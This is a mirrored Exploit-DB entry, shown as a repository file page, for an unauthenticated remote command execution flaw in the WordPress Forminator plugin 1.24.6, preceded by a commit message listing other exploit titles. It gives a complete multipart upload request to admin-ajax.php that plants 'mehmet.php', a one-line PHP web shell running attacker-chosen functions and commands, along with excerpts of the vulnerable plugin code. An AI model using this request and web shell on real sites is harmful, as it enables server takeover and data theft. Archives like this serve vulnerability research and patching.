bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51664.txt
Exploit-DB 010e679abe DB: 2023-08-05 
25 changes to exploits/shellcodes/ghdb

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
2023-08-05 00:16:32 +00:00

100 lines
No EOL
2.8 KiB
Text
Raw Blame History

# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
# Date: 2023-07-20
# Exploit Author: Mehmet Kelepçe
# Vendor Homepage: https://wpmudev.com/project/forminator-pro/
# Software Link: https://wordpress.org/plugins/forminator/
# Version: 1.24.6
# Tested on: PHP - Mysql - Apache2 - Windows 11
HTTP Request and vulnerable parameter:
-------------------------------------------------------------------------
POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 1756
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wp-settings-time-1=1689794282;
wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
Connection: close
.
.
.
.
.
------WebKitFormBoundaryTmsFfkbegmAjomne
Content-Disposition: form-data; name="postdata-1-post-image";
filename="mehmet.php"
Content-Type: application/octet-stream
<?php
$_GET['function']($_GET['cmd']);
?>
Source Code:
wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
--------------------------------------------------------------------
public function has_upload() {
$fields = $this->get_fields();
if ( ! empty( $fields ) ) {
foreach ( $fields as $field ) {
if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
return true;
}
}
}
return false;
}
Vulnerable parameter: postdata-1-post-image
and
Source code:
wp-content/plugins/forminator/library/fields/postdata.php:
-------------------------------------------------------------------
if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
$_FILES[ $image_field_name ]['name'] ) ) {
$file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
$valid = wp_check_filetype( $file_name );
if ( false === $valid['ext'] || ! in_array( $valid['ext'],
$this->image_extensions ) ) {
$this->validation_message[ $image_field_name ] = apply_filters(
'forminator_postdata_field_post_image_nr_validation_message',
esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
$id
);
}
}
}
Vulnerable function: $image_field_name
-------------------------------------------------------------------------
Payload file: mehmet.php
<?php
$_GET['function']($_GET['cmd']);
?>
-------------------------------------------------------------------------
Reference in a new issue View git blame Copy permalink